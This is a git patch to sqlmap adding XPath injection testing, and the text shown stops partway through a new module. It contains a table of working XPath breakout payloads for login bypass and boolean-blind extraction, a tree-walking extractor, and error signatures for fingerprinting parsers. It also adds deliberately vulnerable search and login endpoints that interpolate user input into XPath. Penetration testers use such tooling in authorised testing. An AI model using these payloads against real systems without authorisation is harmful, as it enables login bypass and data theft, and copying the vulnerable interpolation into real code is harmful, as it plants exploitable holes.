From 8ff5d3811a6ced2f4f487337e28cde8a35f45cd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Mon, 29 Jun 2026 00:29:27 +0200 Subject: [PATCH] Adding switch --xpath --- .github/workflows/tests.yml | 4 +- data/txt/sha256sums.txt | 17 +- extra/vulnserver/vulnserver.py | 130 +++++++ lib/controller/checks.py | 8 + lib/controller/controller.py | 5 + lib/core/optiondict.py | 2 + lib/core/settings.py | 40 +- lib/core/testing.py | 1 + lib/parse/cmdline.py | 3 + lib/techniques/xpath/__init__.py | 8 + lib/techniques/xpath/inject.py | 626 +++++++++++++++++++++++++++++++ tests/test_xpath.py | 407 ++++++++++++++++++++ 12 files changed, 1242 insertions(+), 9 deletions(-) create mode 100644 lib/techniques/xpath/__init__.py create mode 100644 lib/techniques/xpath/inject.py create mode 100644 tests/test_xpath.py diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml index 7f3268e69..fac2dc168 100644 --- a/.github/workflows/tests.yml +++ b/.github/workflows/tests.yml @@ -108,7 +108,9 @@ jobs: python -m coverage report --fail-under=50 - name: Smoke test - run: python sqlmap.py --smoke-test + run: | + python -m pip install -q lxml + python sqlmap.py --smoke-test - name: Vuln test run: python sqlmap.py --vuln-test diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index f8337e8c8..b9ca3b144 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh 1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py -32577fc21a6170266438b608ed81620e0b0a889aa8a05124bc7f0905cba772a6 extra/vulnserver/vulnserver.py +a4d4ec8aaea6da7b20068209945cf46348bde74b4c90ddf630c3be820d16f73e extra/vulnserver/vulnserver.py 
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py -c9a1661fc6719655e1e5b6dd72caab680766690c5f746b386093267329f7b3b8 lib/controller/checks.py -256ba0c6967121dc25c95fe09d1165dd8d0530f26c7879e6036f649fb0a6de95 lib/controller/controller.py +0397a941e27fa23ef375b6bd0a654132b05496d78737253a58524aab7e840789 lib/controller/checks.py +e9fd898a38e4e1bfc975e44b41b344c190e58d845b8602a50a2bf05835ddc7c8 lib/controller/controller.py d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py 9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py @@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor 5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py 914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py -1b03686e1aa916ccad3cd86b8e4e6ea4baca5e30e05bf86a56f8df8dd4f44ba6 lib/core/optiondict.py +8b5d4d1f503ef7075820f7eca184c9e55386b7717c5cf93d195fa9e5332d9e34 lib/core/optiondict.py e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/option.py 21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py 49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py @@ -189,18 +189,18 @@ e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/optio 9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -e9aae7dacf83a4d7054862eeb0a96ed695731cd87f8b03836a8a41c7454d0f5f lib/core/settings.py 
+77a4804887ae9dde7142ede91fcae1bd1d7369132f90d7bf095e8bad6f62e5a4 lib/core/settings.py c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py 19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py -46b405d0e0e035b3f323deffc1f1d30505adf7c01144ea2ddf81c5dc6caaa20f lib/core/testing.py +fbfb3fa79ac0566a985b8cdc3a2e4758bdf4ccf9d94428163bfe6432c72d696b lib/core/testing.py 95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py 53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py 2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py 54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py -8351588876a7579fa96b3ab860ef2254487de34ea624c0a7696f2428c24ceb98 lib/parse/cmdline.py +541b517c9cacba2b62122c1dc2be8f2808afdc32e715983edf29998433b531bb lib/parse/cmdline.py 02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py 5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py @@ -249,6 +249,8 @@ e2cd2b19f82393f9bbc8f374686cd851a4ccc264bb898ea54547ec479a05674c lib/techniques 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py 
+ece1fca81148ccf3c5f13b6ad7fb64966cb1ebef245216eac5cb0dd2490989db lib/techniques/xpath/inject.py aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py 442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py @@ -654,6 +656,7 @@ eca021208e388b4d14c53f1e9f8a6e7d685e54ba572fb2a8487e6b620a20bcb5 tests/test_use 2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py 93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py 81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py +c7584cad4f99416e6415744412941f5a47b2f5284270326624bd291edf6d9994 tests/test_xpath.py 55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index 99189fbab..ecf7b1920 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -217,6 +217,84 @@ def nosql_match(params): else: # $eq, $in (single-valued here) and any literal equality return record == value +# --- XPath endpoint (vulnerable search and login, backed by an in-memory XML document) ------------ + +XPATH_XML = """ + + + + luther + Luther Blisset + luther@example.com + db3a16990a0008a3b04707fdef6584a0 + System Administrator + London + +1 555 0100 + + + fluffy + Fluffy Bunny + fluffy@example.com + 4db967ce67b15e7fb84c266a76684729 + Security Engineer + Amsterdam + +1 555 0102 + + + wu + Wu Ming + wu@example.com + f5a2950eaa10f9e99896800eacbe8275 + Network Administrator + Shanghai + +86 21 555 0103 + + + + + linus + Linus Torvalds + linus@example.com + 
8e7b6a5c4d321908f7e6d5c4b3a2910f + Kernel Developer + Portland + +1 555 0200 + + + ada + Ada Lovelace + ada@example.com + 1a2b3c4d5e6f7081920a1b2c3d4e5f60 + Algorithm Designer + London + +44 20 555 0201 + + + + + grace + Grace Hopper + grace@example.com + 9e8d7c6b5a493827160e9d8c7b6a5948 + CTO + New York + +1 555 0300 + + +""" + +def _xpath_element_to_dict(el): + """Convert an lxml element to a dict for JSON serialization.""" + retVal = dict(el.attrib) + retVal["tag"] = el.tag + retVal["text"] = (el.text or "").strip() + children = [] + for child in el: + children.append(_xpath_element_to_dict(child)) + if children: + retVal["children"] = children + return retVal + _conn = None _cursor = None _lock = None @@ -889,6 +967,58 @@ class ReqHandler(BaseHTTPRequestHandler): self.wfile.write(output.encode(UNICODE_ENCODING)) return + if self.url == "/xpath/search": + self.send_response(OK) + self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + + q = self.params.get("q", "") + entries = [] + error = None + + if q: + try: + from lxml import etree + root = etree.fromstring(XPATH_XML.encode("utf-8")) + # VULNERABLE: unsanitized user input directly interpolated into XPath + xpath_expr = "/directory/department/user[contains(username,'%s') or contains(realname,'%s')]" % (q, q) + elements = root.xpath(xpath_expr) + entries = [_xpath_element_to_dict(el) for el in elements] + except Exception as ex: + error = "%s: %s" % (type(ex).__name__, getUnicode(ex)) + + output = json.dumps({"entries": entries, "count": len(entries), "error": error}, default=str) + self.wfile.write(output.encode(UNICODE_ENCODING)) + return + + if self.url == "/xpath/login": + self.send_response(OK) + self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + + username = self.params.get("username", "") + password = 
self.params.get("password", "") + error = None + authenticated = False + + if username and password: + try: + from lxml import etree + root = etree.fromstring(XPATH_XML.encode("utf-8")) + # VULNERABLE: unsanitized interpolation into XPath login expression + xpath_expr = "/directory/department/user[username='%s' and password='%s']" % (username, password) + results = root.xpath(xpath_expr) + if results: + authenticated = True + except Exception as ex: + error = "%s: %s" % (type(ex).__name__, getUnicode(ex)) + + output = json.dumps({"authenticated": authenticated, "error": error}, default=str) + self.wfile.write(output.encode(UNICODE_ENCODING)) + return + if self.url == '/': if not any(_ in self.params for _ in ("id", "query")): self.send_response(OK) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f51d42000..f6a24803d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -83,6 +83,7 @@ from lib.core.settings import GRAPHQL_ERROR_REGEX from lib.core.settings import HEURISTIC_CHECK_ALPHABET from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import LDAP_ERROR_REGEX +from lib.core.settings import XPATH_ERROR_REGEX from lib.core.settings import IPS_WAF_CHECK_PAYLOAD from lib.core.settings import IPS_WAF_CHECK_RATIO from lib.core.settings import IPS_WAF_CHECK_TIMEOUT @@ -1194,6 +1195,13 @@ def heuristicCheckSqlInjection(place, parameter): if conf.beep: beep() + if not conf.xpath and re.search(XPATH_ERROR_REGEX, page or ""): + infoMsg = "heuristic (XPath) test shows that %sparameter '%s' might be vulnerable to XPath injection (rerun with switch '--xpath')" % ("%s " % paramType if paramType != parameter else "", parameter) + logger.info(infoMsg) + + if conf.beep: + beep() + kb.disableHtmlDecoding = False kb.heuristicMode = False diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 2294a66c1..2cffb638c 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ 
-543,6 +543,11 @@ def start(): ldapScan() continue + if conf.xpath: + from lib.techniques.xpath.inject import xpathScan + xpathScan() + continue + if conf.nullConnection: checkNullConnection() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 42c187c89..edbcd97a0 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -120,6 +120,8 @@ optDict = { "technique": "string", "nosql": "boolean", "graphql": "boolean", + "ldap": "boolean", + "xpath": "boolean", "timeSec": "integer", "uCols": "string", "uChar": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index f2d89666b..1f3f57508 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.188" +VERSION = "1.10.6.189" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -977,6 +977,44 @@ LDAP_FINGERPRINT_ATTRIBUTES = ( ("vendorName", "Red Hat", "389 Directory Server"), ) +# XPath error signatures per parser implementation for error-based detection and +# fingerprinting (matched against HTTP response bodies). Each tuple is +# (backend_name, regex_fragment). 
+XPATH_ERROR_SIGNATURES = ( + ("Java JAXP / Xalan", r"(?:javax\.xml\.(?:xpath\.XPathExpressionException|transform\.Transformer(?:Configuration)?Exception)|com\.sun\.org\.apache\.xpath\.(?:XPathException|XPathProcessorException)|org\.apache\.xpath|org\.xml\.sax\.SAX(?:Parse)?Exception)"), + ("Java JAXP / Xalan", r"XPath (?:expression|syntax) error"), + ("Java JAXP / Saxon", r"net\.sf\.saxon\.(?:trans\.XPathException|s9api\.SaxonApiException)"), + ("Java JAXP / Saxon", r"(?:XPST|XPTY|XPDY|XQST|XTDE)\d{4}:"), + (".NET XPathNavigator", r"System\.Xml\.(?:XPath\.XPathException|XmlException)"), + (".NET XPathNavigator", r"Expression must evaluate to a node-set"), + (".NET XPathNavigator", r"has an invalid (?:token|qualified name)"), + ("lxml / libxml2", r"(?:lxml\.etree\.(?:XPath(?:Eval|Document|Syntax)?Error)|libxml2|xmlXPath(?:CompOp|Eval|Err))"), + ("lxml / libxml2", r"(?:XPath error|Invalid (?:expression|predicate))"), + ("PHP SimpleXML / DOMXPath", r"(?:SimpleXMLElement::xpath\(\)|DOMXPath::(?:query|evaluate)\(\))"), + ("PHP SimpleXML / DOMXPath", r"Invalid expression|xmlXPathEval"), + ("Saxon (standalone)", r"(?:net\.sf\.saxon\.(?:s9api\.SaxonApiException|trans\.XPathException)|Saxon error)"), + ("Saxon (standalone)", r"Static error\(s\) in query"), + ("BaseX", r"org\.basex\.(?:query\.QueryException|core\.BaseXException)"), + ("BaseX", r"\[(?:XPST|XPTY|XPDY)\d{4}\]"), + ("eXist", r"org\.exist\.xquery\.(?:XPathException|XQueryException)"), + ("eXist", r"exerr:ERROR"), + ("Python ElementTree", r"xml\.etree\.ElementTree\.(?:ParseError|Element)"), + ("Generic XPath", r"(?:XPath|XSLT).*?(?:error|exception|syntax)"), + ("Generic XPath", r"Invalid XPath|XPath evaluation failed"), +) + +XPATH_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XPATH_ERROR_SIGNATURES) + +# Printable-ASCII codepoint bounds bisected during XPath blind character extraction +XPATH_CHAR_MIN = 0x20 +XPATH_CHAR_MAX = 0x7e + +# Maximum tree depth for recursive XML walking during XPath blind 
extraction +XPATH_MAX_DEPTH = 32 + +# Upper bound for the value-length search during XPath blind extraction +XPATH_MAX_LENGTH = 256 + # Length of prefix and suffix used in non-SQLI heuristic checks NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 diff --git a/lib/core/testing.py b/lib/core/testing.py index 158a218e3..2d8dd5b88 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -91,6 +91,7 @@ def vulnTest(): ("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction ("-u \"graphql\" --graphql --flush-session --disable-hashing", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "GraphQL database tables", "fetched 30 entries from table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "GraphQL scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed) ("-u \"ldap/search?q=x\" --ldap --flush-session --disable-hashing", ("is vulnerable to LDAP injection", "Title: LDAP in-band data exposure", "LDAP: GET parameter 'q' in-band entries", "in-band data exposure", "LDAP scan complete")), # LDAP: error-based detection (unbalanced paren) + boolean oracle + directory attribute extraction via blind substring probing + ("-u \"xpath/search?q=x\" --xpath --flush-session --disable-hashing", ("is vulnerable to XPath injection", "Title: XPath boolean-based blind", "XPath: GET parameter 'q' XML tree", "extracted", "XPath scan complete")), # XPath: error-based detection + boolean oracle + blind XML tree-walking via starts-with character extraction ("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", 
"banner: '3.")), ("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")), ("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)), diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 72e43e1e6..52929cef7 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -424,6 +424,9 @@ def cmdLineParser(argv=None): techniques.add_argument("--ldap", dest="ldap", action="store_true", help="Test for LDAP injection (filter breakout, boolean blind, auth bypass)") + techniques.add_argument("--xpath", dest="xpath", action="store_true", + help="Test for XPath injection (error-based, boolean-blind, blind XML tree-walking)") + techniques.add_argument("--time-sec", dest="timeSec", type=int, help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) diff --git a/lib/techniques/xpath/__init__.py b/lib/techniques/xpath/__init__.py new file mode 100644 index 000000000..bcac84163 --- /dev/null +++ b/lib/techniques/xpath/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/lib/techniques/xpath/inject.py b/lib/techniques/xpath/inject.py new file mode 100644 index 000000000..32d8e6934 --- /dev/null +++ b/lib/techniques/xpath/inject.py @@ -0,0 +1,626 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import difflib +import re +import time + +from collections import namedtuple + +from lib.core.common import beep +from lib.core.common import randomStr +from lib.core.convert import 
getUnicode +from lib.core.data import conf +from lib.core.data import logger +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import PLACE +from lib.core.settings import UPPER_RATIO_BOUND +from lib.core.settings import XPATH_CHAR_MAX +from lib.core.settings import XPATH_CHAR_MIN +from lib.core.settings import XPATH_ERROR_REGEX +from lib.core.settings import XPATH_ERROR_SIGNATURES +from lib.core.settings import XPATH_MAX_DEPTH +from lib.core.settings import XPATH_MAX_LENGTH +from lib.request.connect import Connect as Request +from lib.utils.xrange import xrange + + +SENTINEL = randomStr(length=10, lowercase=True) + +XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST) + +# Each detection breakout is paired with a false variant and an (optional) extraction +# boundary. The boundary carries a prefix/suffix pair that wraps the extraction +# predicate so the surrounding template stays syntactically valid. +# +# Breakouts are listed in detection-priority order: function-argument closers first, +# then simple string, double-quoted, union wildcard, and bare numeric/boolean. 

# Master table of injection breakouts. Each row is a 4-tuple:
#
#   breakout           - appended to the original value to form the TRUE probe
#   false_variant      - appended to the original value to form the FALSE probe;
#                        rows where this is None are skipped by _detectBoolean()
#   extraction_prefix  - text placed between the original value and an extraction
#   extraction_suffix    predicate / after the predicate (see _makePayload());
#                        None marks a row that cannot drive extraction
#
# Row order is the order in which _detectBoolean() tries the breakouts.
_BREAKOUT_TABLE = (
    # (breakout, false_variant, extraction_prefix, extraction_suffix)
    # -- function-argument (closes paren + string)
    ("') or true() or ('", "') and false() and ('", "') or ", " or ('"),
    ("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"),
    ("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"),
    # -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched)
    ("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"),
    ("' or true() or '", "' and false() and '", "' or ", " and '1'='1"),
    ("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"),
    # -- AND context (single-quoted)
    ("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"),
    # -- double-quoted string (suffix absorbs trailing quote)
    ('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'),
    ('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'),
    # -- double-quoted function-argument
    ('") or true() or ("', '") and false() and ("', '") or ', ' or ("'),
    # -- union wildcard (detection-only, no extraction)
    ("']|//*|test['", None, None, None),
    # -- numeric / bare context (extraction uses 'and'; requires original value to not match anything)
    (" or 1=1", " and 1=2", " and ", ""),
    (" or true()", " and false()", " and ", ""),
)

# Boundary: a verified injection boundary with an extraction prefix+suffix and an
# extractable flag. Only extractable boundaries can drive tree-walking.
+Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable")) + +# Convenience lookups built from _BREAKOUT_TABLE +_BREAKOUT_FALSE_MAP = {} +_BREAKOUT_BOUNDARY = {} +_BREAKOUT_LIST = [] +for _entry in _BREAKOUT_TABLE: + _bk, _fv, _pfx, _sfx = _entry + _BREAKOUT_LIST.append(_bk) + _BREAKOUT_FALSE_MAP[_bk] = _fv + if _pfx is not None: + _BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True) + else: + _BREAKOUT_BOUNDARY[_bk] = None +XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST) + +Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary")) +Slot.__new__.__defaults__ = (None, None, None, None, None, None, None) + + +def _ratio(first, second): + return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio() + + +def _delim(place): + return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&' + + +def _confParameters(place): + try: + return conf.parameters.get(place, "") + except AttributeError: + return conf.parameters[place] if place in conf.parameters else "" + + +def _originalValue(place, parameter): + for segment in _confParameters(place).split(_delim(place)): + name, _, value = segment.partition('=') + if name.strip() == parameter: + return value + return conf.paramDict.get(place, {}).get(parameter) or "" + + +def _replaceSegment(place, parameter, value): + delimiter = _delim(place) + raw = _confParameters(place) + retVal, replaced = [], False + + for part in raw.split(delimiter): + name, _, _ = part.partition('=') + if not replaced and name.strip() == parameter: + retVal.append("%s=%s" % (name, value)) + replaced = True + else: + retVal.append(part) + + if not replaced: + retVal = [] + for name, oldValue in conf.paramDict.get(place, {}).items(): + retVal.append("%s=%s" % (name, value if name == parameter else oldValue)) + + return delimiter.join(retVal) + + +def _send(place, parameter, value): + """Issue a single HTTP request with the target parameter set to `value`. 
+ Temporarily mutates conf.parameters so sqlmap's normal request machinery + (URL construction, cookies, headers, encodings) is fully preserved.""" + + if conf.delay: + time.sleep(conf.delay) + + old_params = conf.parameters.get(place, "") + conf.parameters[place] = _replaceSegment(place, parameter, value) + + try: + kwargs = {"raise404": False, "silent": True} + if conf.verbose >= 3: + logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value)) + page, _, _ = Request.getPage(**kwargs) + return page or "" + except Exception as ex: + logger.debug("XPath probe request failed: %s" % getUnicode(ex)) + return "" + finally: + conf.parameters[place] = old_params + + +def _isError(page): + return bool(re.search(XPATH_ERROR_REGEX, getUnicode(page or ""))) + + +def _backendFromError(page): + page = getUnicode(page or "") + for backend, regex in XPATH_ERROR_SIGNATURES: + if re.search(regex, page): + return backend + return "Generic XPath" if _isError(page) else None + + +def _probeBackendByParserError(place, parameter): + """Probe for XPath parser errors to obtain a backend hint. + This is NOT authoritative detection -- only a boolean oracle confirms injection.""" + + original = _originalValue(place, parameter) or "x" + normal = _send(place, parameter, original) + + for suffix in ("'", '"', "')", '")', "]", "|"): + payload = original + suffix + broken = _send(place, parameter, payload) + + if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND: + continue + + backend = _backendFromError(broken) + if backend and not _isError(normal): + return backend, payload + + return None, None + + +def _boolean(truthy, falsy): + """Return the reproducible true page when true/false probes diverge. 
+ Both true AND false pages must be independently reproducible.""" + + truePage = truthy() + if truePage is None or _isError(truePage): + return None + + truePage2 = truthy() + if _ratio(truePage, truePage2) < UPPER_RATIO_BOUND: + return None + + falsePage = falsy() + if falsePage is None or _isError(falsePage): + return None + + falsePage2 = falsy() + if _ratio(falsePage, falsePage2) < UPPER_RATIO_BOUND: + return None + + if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND: + return truePage + + return None + + +def _makePayload(original, boundary, predicate): + """Construct a payload by inserting `predicate` into the verified boundary.""" + if boundary.suffix: + return "%s%s%s%s" % (original, boundary.prefix, predicate, boundary.suffix) + return "%s%s%s" % (original, boundary.prefix, predicate) + + +def _detectBoolean(place, parameter): + """Return (template, payload, boundary) for boolean-blind XPath injection. + boundary is None for detection-only breakouts (wildcard, union).""" + + original = _originalValue(place, parameter) or "" + + for breakout in XPATH_BREAKOUT_PREFIXES: + truePayload = original + breakout + falseVariant = _BREAKOUT_FALSE_MAP.get(breakout) + if not falseVariant: + continue + + falseSpecific = original + falseVariant + template = _boolean(lambda p=truePayload: _send(place, parameter, p), + lambda p=falseSpecific: _send(place, parameter, p)) + if template: + boundary = _BREAKOUT_BOUNDARY.get(breakout) + return template, truePayload, boundary + + # Wildcard: only useful for bool differentiation, not enumeration + if original: + template = _boolean(lambda: _send(place, parameter, "*"), + lambda: _send(place, parameter, SENTINEL)) + if template: + return template, "*", None + + return None, None, None + + +def _isPasswordParam(parameter): + parameter = getUnicode(parameter or "").lower() + return any(_ in parameter for _ in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth")) + + +def _fingerprintByError(backend): + if not backend: 
+ return None + for name, _ in XPATH_ERROR_SIGNATURES: + if name in backend: + return name + return backend + + +def _xpathQuote(s): + """Quote a string for an XPath string literal, choosing the delimiter that + requires no escaping. When both quotes appear, use concat().""" + + s = getUnicode(s) + if "'" not in s: + return "'%s'" % s + if '"' not in s: + return '"%s"' % s + # both quote types present: use concat() with " as outer delimiter + return "concat(%s)" % ", '\"', ".join('"%s"' % part for part in s.split('"')) + + +class _XPathPayloadBuilder(object): + """Build XPath boolean predicates for blind tree-walking using the verified + injection boundary from detection. Each method returns a complete payload.""" + + def __init__(self, original, boundary): + self.original = original or "x" + self.boundary = boundary + + def _make(self, predicate): + return _makePayload(self.original, self.boundary, predicate) + + def nameStartsWith(self, path, prefix): + return self._make("starts-with(name(%s),%s)" % (path, _xpathQuote(prefix))) + + def nameLength(self, path, length): + return self._make("string-length(name(%s))=%d" % (path, length)) + + def childCount(self, path, count): + return self._make("count(%s/*)>=%d" % (path, count)) + + def attributeCount(self, path, count): + return self._make("count(%s/@*)>=%d" % (path, count)) + + def attributeNameStartsWith(self, path, index, prefix): + return self._make("starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))) + + def attributeValueStartsWith(self, path, index, prefix): + return self._make("starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))) + + def textStartsWith(self, path, prefix): + return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix))) + + +def _makeOracle(place, parameter, template): + """Build an oracle from a verified true template. 
extract(payload) returns + True when the response is closer to the true template than to the false page.""" + + cache = {} + + def request(payload): + if payload not in cache: + cache[payload] = _send(place, parameter, payload) + return cache[payload] + + falsePage = request(SENTINEL) + + def oracle(payload): + page = request(payload) + if page is None or _isError(page): + return False + return _ratio(template, page) >= UPPER_RATIO_BOUND + + def extract(payload): + page = request(payload) + if page is None or _isError(page): + return False + trueRatio = _ratio(template, page) + falseRatio = _ratio(falsePage, page) + # Require either an unambiguous match against the template or a + # clear separation from the false page (minimum 5 %pt margin) + return trueRatio >= UPPER_RATIO_BOUND or (trueRatio - falseRatio) > 0.05 + + oracle.extract = extract + oracle.template = template + oracle.falsePage = falsePage + oracle.cache = cache + return oracle + + +# Frequency-ordered charset for blind character extraction. +# Excludes characters that are XPath metacharacters or problematic in URL context. +_META_ORDS = set(ord(_) for _ in ("'", '"', 